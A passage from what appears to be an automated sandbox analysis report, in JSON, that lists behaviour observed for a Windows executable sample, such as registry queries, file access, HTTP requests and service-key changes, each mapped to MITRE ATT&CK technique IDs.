\"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\PSCHED\\PARAMETERS\\WINSOCK\"; Key: \"\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\"; Key: \"\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\PSCHED\"; Key: \"\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP\"; Key: \"\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\DNSCACHE\\PARAMETERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\PSCHED\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\PSCHED\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\bcrypt.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\system32\\bcrypt.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to touch file \"C:\\winhttp.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"\\Device\\RasAcd\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005000)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-190", "relevance": 5, "name": "Calls an APIs used to retrieve geographical location information", "description": "Observed import api \"getaddrinfo\" which can be \"used to convert host name to address\" [Source: 2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d]", "origin": "Static Parser", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005000)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-190", "type": 6, "relevance": 2, "name": "Calls an API typically used to send the specified request to the HTTP server", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3422d8\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"356e90\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3600f0\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"366da0\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"36d1f8\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"373000\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"385ce8\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"38bb30\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3732a0\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"399cb8\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"388b18\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"38e818\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"39c928\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3963c8\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3a23c0\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3b4658\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"2950c60\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3c6af8\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3c6da0\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3c7048\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3c72f0\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3c7598\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3c7840\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3c7ae8\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"3c7d90\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"\n \"$error\": \"2f8f\"}", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.185061685613695", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\PSCHED\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\PSCHED\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: 